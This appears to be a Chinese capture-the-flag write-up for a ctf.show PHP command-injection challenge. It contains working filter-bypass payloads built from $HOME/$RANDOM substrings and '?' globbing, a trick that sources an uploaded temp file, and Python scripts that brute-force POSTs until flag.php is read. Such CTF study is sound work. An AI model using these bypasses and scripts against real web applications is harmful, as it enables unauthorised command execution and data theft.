信息收集
这一题把HOME开放了,把#和PWD给过滤了
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){
$code=$_POST['code'];
if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|PWD|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|#|%|\>|\'|\"|\`|\||\,/', $code)){
if(strlen($code)>65){
echo '<div align="center">'.'you are so long , I dont like '.'</div>';
}
else{
echo '<div align="center">'.system($code).'</div>';
}
}
else{
echo '<div align="center">evil input</div>';
}
}?>
解题
deepseek想了12分钟,也没给我准确的能绕过这个过滤构造出1的方法,答案也是错误的
答案给的>A配合$?可以直接构造1
import requests
from time import sleep
url = "http://aea25cb2-0314-400e-9fb0-a800499dea70.challenge.ctf.show/" # http不要s
# . /tmp/php?????A ==> . /???/?h??????A
payload = "<A;. ${HOME::$?}???${HOME::$?}????????A"
file = { "file": "tac flag.php" }
data = { "code": payload }
for i in range(1000):
response = requests.request("POST", url, files=file, data=data)
if (len(response.text)) != 3069: # len可能需要微调
print(response.text)
print(len(response.text))
break
print(i, end=" ")
sleep(0.3)
构造命令
最好不要以4结尾,比较末尾带个4更为常见
/bin/base64 flag.php
/???/???6? ???.???
<A;${HOME::$?}???${HOME::$?}????${RANDOM::$?}? ????.???
要手工一直刷,运气不好得刷近百次所以直接写脚本了,我顺手把base64也解了
要是代码没解密base64,手动解一下就可以了
import requests
from time import sleep
import base64
url = "http://aea25cb2-0314-400e-9fb0-a800499dea70.challenge.ctf.show/" # http不要s
# . /tmp/php?????A ==> . /???/?h??????A
payload = "<A;${HOME::$?}???${HOME::$?}????${RANDOM::$?}? ????.???"
data = { "code": payload }
for i in range(1000):
response = requests.request("POST", url, data=data)
if (len(response.text)) != 3069: # len可能需要微调
string = response.text
print(string)
print(len(string))
string = string[string.find('</code>')+len('</code>'):string.find('<div align="center">')].replace('\n', '')
print(f"\n-------------------\n{string}\ndecode-base64: \n", base64.b64decode(string).decode())
break
print(i, end=" ")
sleep(0.3)
